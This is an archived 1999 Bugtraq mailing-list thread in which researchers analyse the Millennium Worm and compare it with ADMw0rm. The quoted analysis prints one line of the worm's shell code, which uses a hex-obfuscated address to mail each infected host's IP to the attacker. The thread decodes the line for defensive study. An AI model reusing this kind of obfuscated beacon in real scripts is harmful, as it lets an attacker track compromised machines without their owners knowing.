Bugtraq mailing list archives

Re: MW

From: vision () WHITEHATS COM (Max Vision)
Date: Mon, 20 Sep 1999 02:45:59 -0700

Hello,

I posted two short write-ups on recent Internet worms I've seen in the wild
(ADMw0rm and Millennium Worm).  http://whitehats.com/worms/.  From these
Millennium Worm.

Max Vision

At 05:23 PM 9/7/1999 +0200, Adam Morrison wrote:
On Wed, 1 Sep 1999, Christian Koderer wrote:
./IP | mail `printf
"\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
logout
_EOF_

In case no one bothered figuring this one out, this translates to
'beurp () hotmail com'

Apparently './IP' is a program it runs to figure out which IP it should
get the worm files from. Did you find a similarly named file?

It's a worm; it gets the worm files from the last infected machine.
`IP' returns the address of the machine that the copy of the worm
is running on, and is used in the `cmd' grappling hook which
apparently gets executed on compromised remote hosts.  Each time the
worm infects a machine, it mails the IP address of that machine to
<beurp () hotmail com>.

Now, not to make any unfounded allegations, but this worm looks
remarkably like ADMw0rm.  I wonder why it restarts named when first
infecting a host, when it appears to also utilize several other
vulnerabilites in order to get in.  Ho, hum.